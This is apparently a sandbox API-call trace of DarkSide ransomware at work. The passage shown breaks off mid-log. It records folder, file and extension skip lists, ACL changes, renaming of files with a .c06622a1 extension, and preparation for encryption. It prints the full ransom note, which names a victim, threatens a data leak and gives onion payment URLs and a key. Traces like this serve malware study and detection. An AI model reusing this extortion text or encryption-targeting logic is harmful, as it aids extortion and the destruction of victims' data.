[0149.922] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0149.922] wcslen (_String="bootfont.bin") returned 0xc [0149.922] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0149.922] wcslen (_String="bootsect.bak") returned 0xc [0149.922] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0149.922] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0149.922] _wcsicmp (_Str1="$recycle.bin", _Str2="Links") returned -72 [0149.922] wcslen (_String="$recycle.bin") returned 0xc [0149.922] _wcsicmp (_Str1="config.msi", _Str2="Links") returned -9 [0149.922] wcslen (_String="config.msi") returned 0xa [0149.922] _wcsicmp (_Str1="$windows.~bt", _Str2="Links") returned -72 [0149.922] wcslen (_String="$windows.~bt") returned 0xc [0149.922] _wcsicmp (_Str1="$windows.~ws", _Str2="Links") returned -72 [0149.922] wcslen (_String="$windows.~ws") returned 0xc [0149.922] _wcsicmp (_Str1="windows", _Str2="Links") returned 11 [0149.922] wcslen (_String="windows") returned 0x7 [0149.922] _wcsicmp (_Str1="appdata", _Str2="Links") returned -11 [0149.922] wcslen (_String="appdata") returned 0x7 [0149.922] _wcsicmp (_Str1="application data", _Str2="Links") returned -11 [0149.923] wcslen (_String="application data") returned 0x10 [0149.923] _wcsicmp (_Str1="boot", _Str2="Links") returned -10 [0149.923] wcslen (_String="boot") returned 0x4 [0149.923] _wcsicmp (_Str1="google", _Str2="Links") returned -5 [0149.923] wcslen (_String="google") returned 0x6 [0149.923] _wcsicmp (_Str1="mozilla", _Str2="Links") returned 1 [0149.923] wcslen (_String="mozilla") returned 0x7 [0149.923] _wcsicmp (_Str1="program files", _Str2="Links") returned 4 [0149.923] wcslen (_String="program files") returned 0xd [0149.923] _wcsicmp (_Str1="program files (x86)", _Str2="Links") returned 4 [0149.923] wcslen (_String="program files (x86)") returned 0x13 [0149.923] _wcsicmp (_Str1="programdata", _Str2="Links") returned 4 [0149.923] wcslen (_String="programdata") returned 0xb [0149.923] _wcsicmp (_Str1="system volume information", _Str2="Links") returned 7 [0149.923] wcslen (_String="system volume information") returned 0x19 [0149.923] _wcsicmp (_Str1="tor browser", _Str2="Links") returned 8 [0149.923] wcslen (_String="tor browser") returned 0xb [0149.923] _wcsicmp (_Str1="windows.old", _Str2="Links") returned 11 [0149.923] wcslen (_String="windows.old") returned 0xb [0149.924] _wcsicmp (_Str1="intel", _Str2="Links") returned -3 [0149.924] wcslen (_String="intel") returned 0x5 [0149.924] _wcsicmp (_Str1="msocache", _Str2="Links") returned 1 [0149.924] wcslen (_String="msocache") returned 0x8 [0149.924] _wcsicmp (_Str1="perflogs", _Str2="Links") returned 4 [0149.926] wcslen (_String="perflogs") returned 0x8 [0149.926] _wcsicmp (_Str1="x64dbg", _Str2="Links") returned 12 [0149.926] wcslen (_String="x64dbg") returned 0x6 [0149.927] _wcsicmp (_Str1="public", _Str2="Links") returned 4 [0149.927] wcslen (_String="public") returned 0x6 [0149.927] _wcsicmp (_Str1="all users", _Str2="Links") returned -11 [0149.927] wcslen (_String="all users") returned 0x9 [0149.927] _wcsicmp (_Str1="default", _Str2="Links") returned -8 [0149.927] wcslen (_String="default") returned 0x7 [0149.927] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" [0149.927] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 0x2d [0149.927] wcscpy (in: _Dest=0x44b00c0, _Source="Links" | out: _Dest="Links") returned="Links" [0149.927] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.928] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.930] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0149.930] GetNamedSecurityInfoW () returned 0x0 [0149.931] SetEntriesInAclW () returned 0x0 [0149.931] SetNamedSecurityInfoW () returned 0x0 [0149.933] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57ab8) returned 1 [0149.933] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.933] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links")) returned 1 [0149.933] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0149.933] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0149.971] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0149.972] CloseHandle (hObject=0x678) returned 1 [0149.973] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links")) returned 0x11 [0149.973] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="" [0149.973] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 0x32 [0149.973] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0149.973] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd80108c0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd80108c0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.974] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0149.974] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0149.974] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0149.974] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0149.974] wcslen (_String="autorun.inf") returned 0xb [0149.974] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0149.974] wcslen (_String="boot.ini") returned 0x8 [0149.974] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0149.974] wcslen (_String="bootfont.bin") returned 0xc [0149.974] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0149.974] wcslen (_String="bootsect.bak") returned 0xc [0149.974] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0149.974] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7fc4600, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd7fc4600, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd80108c0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.974] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.975] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0149.975] _wcsicmp (_Str1="Suggested Sites.url", _Str2="README.c06622a1.TXT") returned 1 [0149.975] wcsstr (_Str="Suggested Sites.url", _SubStr="README") returned 0x0 [0149.975] _wcsicmp (_Str1="autorun.inf", _Str2="Suggested Sites.url") returned -18 [0149.975] wcslen (_String="autorun.inf") returned 0xb [0149.975] _wcsicmp (_Str1="boot.ini", _Str2="Suggested Sites.url") returned -17 [0149.975] wcslen (_String="boot.ini") returned 0x8 [0149.975] _wcsicmp (_Str1="bootfont.bin", _Str2="Suggested Sites.url") returned -17 [0149.975] wcslen (_String="bootfont.bin") returned 0xc [0149.975] _wcsicmp (_Str1="bootsect.bak", _Str2="Suggested Sites.url") returned -17 [0149.975] wcslen (_String="bootsect.bak") returned 0xc [0149.975] _wcsicmp (_Str1="desktop.ini", _Str2="Suggested Sites.url") returned -15 [0149.975] wcslen (_String="desktop.ini") returned 0xb [0149.975] _wcsicmp (_Str1="iconcache.db", _Str2="Suggested Sites.url") returned -10 [0149.975] wcslen (_String="iconcache.db") returned 0xc [0149.975] _wcsicmp (_Str1="ntldr", _Str2="Suggested Sites.url") returned -5 [0149.975] wcslen (_String="ntldr") returned 0x5 [0149.975] _wcsicmp (_Str1="ntuser.dat", _Str2="Suggested Sites.url") returned -5 [0149.975] wcslen (_String="ntuser.dat") returned 0xa [0149.975] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Suggested Sites.url") returned -5 [0149.975] wcslen (_String="ntuser.dat.log") returned 0xe [0149.975] _wcsicmp (_Str1="ntuser.ini", _Str2="Suggested Sites.url") returned -5 [0149.975] wcslen (_String="ntuser.ini") returned 0xa [0149.975] _wcsicmp (_Str1="thumbs.db", _Str2="Suggested Sites.url") returned 1 [0149.976] wcslen (_String="thumbs.db") returned 0x9 [0149.976] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0149.976] wcslen (_String="386") returned 0x3 [0149.976] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0149.976] wcslen (_String="adv") returned 0x3 [0149.976] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0149.976] wcslen (_String="ani") returned 0x3 [0149.976] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0149.976] wcslen (_String="bat") returned 0x3 [0149.976] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0149.976] wcslen (_String="bin") returned 0x3 [0149.976] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0149.976] wcslen (_String="cab") returned 0x3 [0149.976] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0149.976] wcslen (_String="cmd") returned 0x3 [0149.976] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0149.976] wcslen (_String="com") returned 0x3 [0149.976] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0149.976] wcslen (_String="cpl") returned 0x3 [0149.976] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0149.976] wcslen (_String="cur") returned 0x3 [0149.976] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0149.976] wcslen (_String="deskthemepack") returned 0xd [0149.977] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0149.977] wcslen (_String="diagcab") returned 0x7 [0149.977] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0149.977] wcslen (_String="diagcfg") returned 0x7 [0149.977] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0149.977] wcslen (_String="diagpkg") returned 0x7 [0149.977] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0149.977] wcslen (_String="dll") returned 0x3 [0149.977] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0149.977] wcslen (_String="drv") returned 0x3 [0149.985] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0149.985] wcslen (_String="exe") returned 0x3 [0149.985] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0149.985] wcslen (_String="hlp") returned 0x3 [0149.985] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0149.985] wcslen (_String="icl") returned 0x3 [0149.985] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0149.985] wcslen (_String="icns") returned 0x4 [0149.985] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0149.985] wcslen (_String="ico") returned 0x3 [0149.985] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0149.985] wcslen (_String="ics") returned 0x3 [0149.985] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0149.985] wcslen (_String="idx") returned 0x3 [0149.985] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0149.985] wcslen (_String="ldf") returned 0x3 [0149.986] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0149.986] wcslen (_String="lnk") returned 0x3 [0149.986] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0149.986] wcslen (_String="mod") returned 0x3 [0149.986] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0149.986] wcslen (_String="mpa") returned 0x3 [0149.986] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0149.986] wcslen (_String="msc") returned 0x3 [0149.986] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0149.986] wcslen (_String="msp") returned 0x3 [0149.986] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0149.986] wcslen (_String="msstyles") returned 0x8 [0149.986] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0149.986] wcslen (_String="msu") returned 0x3 [0149.986] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0149.986] wcslen (_String="nls") returned 0x3 [0149.986] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0149.986] wcslen (_String="nomedia") returned 0x7 [0149.986] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0149.986] wcslen (_String="ocx") returned 0x3 [0149.986] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0149.986] wcslen (_String="prf") returned 0x3 [0149.986] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0149.986] wcslen (_String="ps1") returned 0x3 [0149.986] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0149.987] wcslen (_String="rom") returned 0x3 [0149.987] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0149.987] wcslen (_String="rtp") returned 0x3 [0149.987] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0149.987] wcslen (_String="scr") returned 0x3 [0149.987] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0149.987] wcslen (_String="shs") returned 0x3 [0149.987] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0149.987] wcslen (_String="spl") returned 0x3 [0149.987] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0149.987] wcslen (_String="sys") returned 0x3 [0149.987] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0149.987] wcslen (_String="theme") returned 0x5 [0149.987] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0149.987] wcslen (_String="themepack") returned 0x9 [0149.987] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0149.987] wcslen (_String="wpx") returned 0x3 [0149.987] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0149.987] wcslen (_String="lock") returned 0x4 [0149.987] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0149.987] wcslen (_String="key") returned 0x3 [0149.987] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0149.987] wcslen (_String="hta") returned 0x3 [0149.987] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0149.988] wcslen (_String="msi") returned 0x3 [0149.988] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0149.988] wcslen (_String="pdb") returned 0x3 [0149.988] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0149.988] wcslen (_String="sql") returned 0x3 [0149.988] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0149.988] wcslen (_String="sqlite") returned 0x6 [0149.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links")) returned 0x11 [0149.988] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0149.988] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0149.988] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned 0x31 [0149.988] wcscpy (in: _Dest=0x45000f4, _Source="Suggested Sites.url" | out: _Dest="Suggested Sites.url") returned="Suggested Sites.url" [0149.989] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", dwFileAttributes=0x80) returned 1 [0149.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0149.989] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.989] ReadFile (in: hFile=0x610, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0149.990] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x1f5814c0 [0149.990] RtlComputeCrc32 (PartialCrc=0x14c0, Buffer=0x3fe8f4, Length=0x80) returned 0x155cf349 [0149.990] RtlComputeCrc32 (PartialCrc=0xf349, Buffer=0x3fe8f4, Length=0x80) returned 0xf9a29d6d [0149.990] RtlComputeCrc32 (PartialCrc=0x9d6d, Buffer=0x3fe8f4, Length=0x80) returned 0x16f06e41 [0149.990] RtlComputeCrc32 (PartialCrc=0x6e41, Buffer=0x3fe8f4, Length=0x80) returned 0x21909be5 [0149.990] CloseHandle (hObject=0x610) returned 1 [0149.990] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0149.991] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" [0149.991] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 0x45 [0149.991] wcscpy (in: _Dest=0x4510122, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.991] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.c06622a1"), dwFlags=0x8) returned 1 [0149.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x610 [0149.996] CreateIoCompletionPort (FileHandle=0x610, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.996] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0150.004] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x23034430 [0150.004] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50225114 [0150.004] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x53f83334 [0150.004] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x19d90885 [0150.004] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4da430b0 [0150.004] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x53a876ee [0150.004] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x8e12b0f [0150.004] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4ee13e72 [0150.007] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x3bca64be [0150.007] RtlComputeCrc32 (PartialCrc=0x64be, Buffer=0x2f30094, Length=0x80) returned 0x7d14d210 [0150.007] RtlComputeCrc32 (PartialCrc=0xd210, Buffer=0x2f30094, Length=0x80) returned 0x856ef18 [0150.007] RtlComputeCrc32 (PartialCrc=0xef18, Buffer=0x2f30094, Length=0x80) returned 0x301df192 [0150.007] RtlComputeCrc32 (PartialCrc=0xf192, Buffer=0x2f30094, Length=0x80) returned 0x8e3eafa0 [0150.007] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0150.007] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.007] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.007] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0150.008] _wcsicmp (_Str1="Web Slice Gallery.url", _Str2="README.c06622a1.TXT") returned 5 [0150.008] wcsstr (_Str="Web Slice Gallery.url", _SubStr="README") returned 0x0 [0150.008] _wcsicmp (_Str1="autorun.inf", _Str2="Web Slice Gallery.url") returned -22 [0150.008] wcslen (_String="autorun.inf") returned 0xb [0150.008] _wcsicmp (_Str1="boot.ini", _Str2="Web Slice Gallery.url") returned -21 [0150.008] wcslen (_String="boot.ini") returned 0x8 [0150.008] _wcsicmp (_Str1="bootfont.bin", _Str2="Web Slice Gallery.url") returned -21 [0150.008] wcslen (_String="bootfont.bin") returned 0xc [0150.008] _wcsicmp (_Str1="bootsect.bak", _Str2="Web Slice Gallery.url") returned -21 [0150.008] wcslen (_String="bootsect.bak") returned 0xc [0150.008] _wcsicmp (_Str1="desktop.ini", _Str2="Web Slice Gallery.url") returned -19 [0150.008] wcslen 